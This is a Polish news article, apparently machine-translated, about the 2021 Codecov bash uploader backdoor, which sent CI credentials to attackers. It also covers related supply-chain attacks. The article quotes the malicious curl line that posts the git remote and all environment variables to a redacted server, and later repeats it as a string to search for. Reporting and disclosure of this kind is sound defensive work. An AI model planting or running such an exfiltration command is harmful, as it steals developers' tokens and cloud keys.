Gry

Narzędzie deweloperskie z backdoorkiem, które ukradło dane uwierzytelniające, uniknęło powiadomienia przez 3 miesiące

Narzędzie deweloperskie z backdoorkiem, które ukradło dane uwierzytelniające, uniknęło powiadomienia przez 3 miesiące

Getty Images

Publicznie dostępne narzędzie programistyczne zawierało złośliwy kod, który ukradł dane uwierzytelniające potrzebne aplikacjom, aby uzyskać dostęp do poufnych zasobów. To najnowsze odkrycie ataku na łańcuch dostaw, który może potencjalnie zagrozić sieciom niezliczonych organizacji.

Program przesyłający bash Codecov zawierał backdoora od końca stycznia do początku kwietnia, poinformowali twórcy narzędzia w czwartek. Backdoor spowodował, że komputery programistów wysyłały tajne tokeny uwierzytelniające i inne poufne dane do zdalnej witryny kontrolowanej przez hakerów. Program do przesyłania współpracuje z platformami programistycznymi, w tym Github Actions, CircleCI i Bitrise Step, z których wszystkie obsługują posiadanie takich tajnych tokenów uwierzytelniających w środowisku programistycznym.

Stos AWS i innych danych uwierzytelniających w chmurze

Program ładujący Codecov bash wykonuje tak zwane pokrycie kodu dla projektów tworzenia oprogramowania na dużą skalę. Umożliwia programistom wysyłanie raportów pokrycia, które między innymi określają, jaka część bazy kodu została przetestowana przez wewnętrzne skrypty testowe. Niektóre projekty programistyczne integrują Codecov i podobne usługi stron trzecich na swoich platformach, gdzie istnieje bezpłatny dostęp do poufnych danych uwierzytelniających, które można wykorzystać do kradzieży lub modyfikacji kodu źródłowego.

Kod podobny do tego pojedynczego wiersza pojawił się po raz pierwszy 31 stycznia:

curl -sm 0.5 -d “$(git remote -v)<<<<<< ENV $(env)” https:///upload/v2 || true

Kod wysyła zarówno lokalizację repozytorium GitHub, jak i całe środowisko procesu do zdalnej witryny, która została zredagowana, ponieważ Codecov twierdzi, że jest częścią trwającego federalnego dochodzenia. Te typy środowisk zazwyczaj przechowują tokeny, poświadczenia i inne tajemnice oprogramowania w Amazon Web Services lub GitHub.

Uzbrojony w te sekrety nie brakuje złośliwych rzeczy, które osoba atakująca może zrobić w środowiskach programistycznych, które polegały na tym narzędziu, powiedział HD Moore, ekspert ds. Bezpieczeństwa i dyrektor generalny platformy wykrywania sieci Rumble.

„To naprawdę zależy od tego, co znajdowało się w środowisku, ale od momentu, w którym napastnicy mieli dostęp (za pośrednictwem programu do przesyłania bash), mogli być w stanie umieścić tylne drzwi w systemach, w których były uruchamiane” – napisał w bezpośredniej wiadomości z Ars . „W przypadku GitHub / CircleCI spowodowałoby to głównie ujawnienie kodu źródłowego i danych uwierzytelniających”.

Moore kontynuował:

Atakujący prawdopodobnie skończyli ze stosem AWS i innych danych uwierzytelniających w chmurze, oprócz tokenów, które mogłyby dać im dostęp do prywatnych repozytoriów, które obejmują kod źródłowy, ale także wszystkie inne rzeczy, do których token był autoryzowany. W skrajnym przypadku te dane uwierzytelniające utrwalałyby się samoczynnie – atakujący wykorzystują skradziony token GitHub do backdoora do kodu źródłowego, który następnie kradnie dane klientów, itd. To samo może dotyczyć AWS i innych danych uwierzytelniających w chmurze. Jeśli pozwolą na to poświadczenia, mogą umożliwić przejęcie infrastruktury, dostęp do bazy danych, dostęp do plików itp.

W czwartkowym komunikacie Codecov powiedział, że złośliwa wersja programu do przesyłania bash może uzyskać dostęp do:

  • Wszelkie dane uwierzytelniające, tokeny lub klucze, które nasi klienci przechodzili przez ich runner CI (ciągłej integracji), które byłyby dostępne po wykonaniu skryptu do przesyłania bash
  • Wszelkie usługi, magazyny danych i kod aplikacji, do których można uzyskać dostęp za pomocą tych poświadczeń, tokenów lub kluczy
  • Zdalne informacje git (adres URL repozytorium pochodzenia) repozytoriów korzystających z programów przesyłających bash w celu przesłania pokrycia do Codecov w CI

„Na podstawie dotychczasowych wyników dochodzeń kryminalistycznych wydaje się, że od 31 stycznia 2021 r. Występował okresowy nieautoryzowany dostęp do klucza Google Cloud Storage (GCS), co umożliwiło złośliwej osobie trzeciej zmianę wersji naszego skryptu do przesyłania bash na potencjalnie eksportować informacje podlegające ciągłej integracji z serwerem innej firmy ”- powiedział Codecov. „Codecov zabezpieczył i naprawił skrypt 1 kwietnia 2021 r.”

Doradca Codecov powiedział, że błąd w procesie tworzenia obrazu Docker firmy Codecov pozwolił hakerowi na wyodrębnienie danych uwierzytelniających wymaganych do zmodyfikowania skryptu wgrywającego bash.

Fałszowanie zostało wykryte 1 kwietnia przez klienta, który zauważył, że shasum, który działa jako cyfrowy odcisk palca w celu potwierdzenia integralności programu do przesyłania bash, nie pasuje do shasum dla wersji pobranej z https://codecov.io/bash. Klient skontaktował się z Codecov, a producent narzędzi pobrał złośliwą wersję i rozpoczął dochodzenie.

Codecov apeluje do każdego, kto używał aktualizacji bash w okresie, którego dotyczy problem, do unieważnienia wszystkich poświadczeń, tokenów lub kluczy znajdujących się w procesach CI i utworzenia nowych. Deweloperzy mogą określić, jakie klucze i tokeny są przechowywane w środowisku CI, uruchamiając env polecenie w potoku CI. Wszystko, co delikatne, powinno zostać uznane za narażone na szwank.

Ponadto każdy, kto korzysta z lokalnie przechowywanej wersji programu do przesyłania bash, powinien sprawdzić, czy:

Curl -sm 0.5 -d “$(git remote -v)

Jeśli to polecenie pojawi się w dowolnym miejscu lokalnie przechowywanego programu do przesyłania bash, użytkownicy powinni natychmiast zastąpić program przesyłający najnowszą wersją z https: //codecov.io.bash.

Codecov powiedział, że jest mało prawdopodobne, aby miało to wpływ na programistów używających wersji aktualizacji bash na własnym serwerze. „Aby miało to wpływ, Twój potok CI musiałby pobierać program do przesyłania bash z https://codecov.io/bash zamiast z własnej instalacji Codecov. Możesz sprawdzić, skąd pobierasz program do przesyłania bash, patrząc na konfigurację potoku CI ”- powiedziała firma.

Atrakcyjność ataków na łańcuch dostaw

Kompromis w zakresie rozwoju oprogramowania i systemu dystrybucji firmy Codecov jest najnowszym atakiem na łańcuch dostaw, który wyszedł na jaw. W grudniu podobny kompromis uderzył w SolarWinds, producenta narzędzi do zarządzania siecią z Austin w Teksasie, z których korzysta około 300 000 organizacji na całym świecie, w tym firmy z listy Fortune 500 i agencje rządowe.

Hakerzy, którzy dokonali włamania, rozpowszechnili następnie aktualizację z archiwizacją, którą pobrało około 18 000 klientów. Około 10 amerykańskich agencji federalnych i 100 prywatnych firm ostatecznie otrzymało kolejne ładunki, które wysyłały poufne informacje na serwery kontrolowane przez atakującego. FireEye, Microsoft, Mimecast i Malwarebytes zostały uwzględnione w kampanii.

Niedawno hakerzy przeprowadzili atak na łańcuch dostaw oprogramowania, który został wykorzystany do zainstalowania złośliwego oprogramowania do monitoringu na komputerach osób korzystających z NoxPlayer, pakietu oprogramowania emulującego system operacyjny Android na komputerach PC i Mac, głównie po to, aby użytkownicy mogli grać w gry mobilne na tych platformach . Badacze z ESET twierdzą, że wersja NoxPlayer z backdoorem była dostępna przez pięć miesięcy.

Atrakcyjność ataków na łańcuch dostaw dla hakerów polega na ich rozległości i skuteczności. Narażając jednego gracza na wysokim poziomie w oprogramowaniu, hakerzy mogą potencjalnie zainfekować każdą osobę lub organizację, która używa zaatakowanego produktu. Kolejna funkcja, którą hakerzy uważają za korzystną: cele często niewiele lub nic nie mogą zrobić, aby wykryć złośliwe oprogramowanie rozpowszechniane w ten sposób, ponieważ podpisy cyfrowe wskazują, że jest ono legalne.

Jednak w przypadku wersji z aktualizacją basha z backdoorem, Codecov lub którykolwiek z jego klientów mógłby łatwo wykryć złośliwość, robiąc tylko sprawdzenie shasum. Zdolność złośliwej wersji do unikania powiadomienia przez trzy miesiące wskazuje, że nikt nie zadał sobie trudu, aby wykonać tę prostą kontrolę.

Osoby, które korzystały z aktualizacji bash między 31 stycznia a 1 kwietnia, powinny dokładnie sprawdzić swoje kompilacje deweloperskie pod kątem oznak kompromisu, wykonując kroki opisane w czwartkowym poradniku.

Zostaw komentarz

Maciek Luboński
Z wykształcenia jestem kucharzem , ale to nie przeszkadza mi pisać dla Was tekstów z wielu ciekawych dziedzin , których sam jestem fanem.Piszę dużo i często nie na tak jak trzeba , ale co z tego skoro tak naprawdę liczy się pasja.

Najlepsze recenzje

Video

gallery

Facebook